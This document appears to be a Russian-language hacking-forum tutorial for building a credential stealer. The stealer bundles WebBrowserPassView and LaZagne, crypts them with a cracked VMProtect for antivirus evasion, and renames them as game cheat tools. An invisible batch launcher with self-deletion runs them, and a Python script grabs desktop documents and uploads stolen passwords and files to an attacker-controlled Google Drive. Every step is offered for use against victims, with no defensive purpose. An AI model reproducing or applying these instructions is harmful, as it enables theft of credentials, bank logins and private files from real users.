Стиллер паролей с отправкой на Google Диск

Стиллер паролей с отправкой на Google Диск

DARK FORCE
Стилер (от английского to steal, воровать) — определенный класс троянов (малвари, вирусов - как хотите), функционал которых полностью состоит из кражи сохраненных в системе паролей и отправка их "автору".

Стилер, пользуясь наивностью чукотских программистов, залазит в хранилища часто используемых программ и нагло тырит оттуда все логины, пароли и т.п. Следующий, он же последний этап работы программ данного класса — отправка вкусняшек злоумышленнику. Вот как-то так всё это и работает.


Из всего вышеописанного следует один громадный минус подобного софта: если пароли не сохранены, то парнишке-злодею стилер ничего не отправит.


Теперь о основных фичах стилеров. Чаще всего эти троянчеги воруют сохраненные пароли из браузеров (акки, банки и т.п.), FTP-клиентов и IM-клиентов (шестизнаки и т.п.). Отправка паролей может происходить в открытую - т.е. уже расшифрованные голые пароли передаются на гейт или еще куда, или же в зашифрованном виде. В идеале — в таком виде, чтобы никто кроме нашего парнишки не смог бы добраться до украденных паролей.


Логи (ну т.е. сразу пачка паролей от пользователя) в большинстве случаев отправляются на FTP-сервер, на гейт или на почту. А в нашем случае на Google Диск.


Возможности стилера:

  • Запуск на нескольких компах одновременно (с Telegram ботом такое не прокатит)
  • Стил паролей из firefox (webpassview не умеет этого делать) (Можно легко допилить стил на Chrome и т.д.)
  • Стил документов с рабочего стола
  • Отправка на google диск
  • Самоудаление
  • Безпалевность (проблемы могут быть только с есетом)


Итак, приступим!

Нам понадобится:

Python 3.6 прописанный в PATH

WebBrowserPassView с поддержкой командной строки: https://www.nirsoft.net/password_recovery_tools.html (нажимаем на "Click this download link")

laZagne: https://github.com/AlessandroZ/LaZagne/releases/ (Выбираем windows.zip)

Bat to exe converter: http://www.f2ko.de/downloads/Bat_To_Exe_Converter.zip

Криптор - VMProtect Professional 2.13.8 [Cracked]


Ход процесса:

1. Распаковываем архив и копируем файлы WebBrowserPassView.exe и laZagne.exe в разархивированную папку

2. Открываем WebBrowserPassView.exe в Resource hacker и удаляем все, кроме этих трех папок: 


По желанию меняем Version info. Открываем laZagne.exe в Resource hacker и удаляем все папки.

3. Криптуем оба файла:


4. Удаляем файлы xxx_original.exe и оригиналы файлов

5. Переименовываем файлы xxx.vmp.exe как вам захочется, но запоминаем названия

6. Если не нужно самоудаление, в файле run.bat удаляем последнюю строчку

7. Запускаем bat to exe converter и конвертируем run.bat с такими настройками (exe-format 32 bit | Windows (Invisible)):

Редактируем скрипты в папке py:

8. В командной строке от имени администратора пишем:

pip install --upgrade cx_Freeze

pip install --upgrade google-api-python-client

9. В файле app.py ищем строки:

extlist = [".doc", ".docx", ".txt", ".png", ".svg", ".jpg", ".jpeg"]

file1 = "cheatHelper.exe"

file2 = "steamConnect.exe"

Первая строка это расширения файлов, которые мы будем тырить с рабочего стола, вписываем что хотим

Вторая строка это название WebBrowserPassView.exe, вписываем свое

Третья строка это название laZagne.exe, вписываем свое

10. В папке py Shift + ПКМ по пустому месту -> открыть командную строку и пишем py setup.py build

11. Появляется папка build и в ней папка exe.win32-3.6. Копируем в нее файлы run.exe, ваши переименованные WebBrowserPassView.exe и laZagne.exe


Подключаем вирус к Google диску:

12. Переходим по ссылке: https://console.developers.google.com/flows/enableapi?apiid=drive и выбираем аккаунт, на который будут загружатся пароли

13. Выбираем да, да нажимаем "принять и продолжить"

14. Нажимаем "создать учетные данные"

15. Внизу жмем "Отмена"

t.me/INHIDE


16. Переходим на вкладку "Окно запроса доступа OAuth"

17. В название продукта вводим "File uploader", нажимаем "сохранить"


18. Нажимаем создать учетные данные -> Идентификатор клиента OAuth


19. Выбираем другие типы, название File uploader, создать

20. Нажимаем ок, кликаем по названию File uploader, скачать файл json

21. Получаем файл client_secret_xxxxxx.json, переименовываем его в client_secret.json и кладем в папку exe.win32-3.6

22. Запускаем app.exe откроется страница, в ней выбираем тот же аккаунт, который настраивали ранее, нажимаем разрешить, после появления надписи 

 закрываем страницу (Ваши пароли и файлы с рабочего стола сразу же загрузятся на googlle диск, можете их от туда удалить)

23. Закрываем окно с app.exe и удаляем файл client_secret.json


Готово: можно запаковать в sfx архив с запуском run.exe

Пароли и файлы сохраняются в таком виде (не спрашивайте, почему так тупо):

В папке с паролями (data0.bin - пароли в текстовом виде из webpassview, data1.bin пароли из laZagne):

При каждом запуске создается две папки New folder и папок по количеству папок на рабочем столе жертвы






Report Page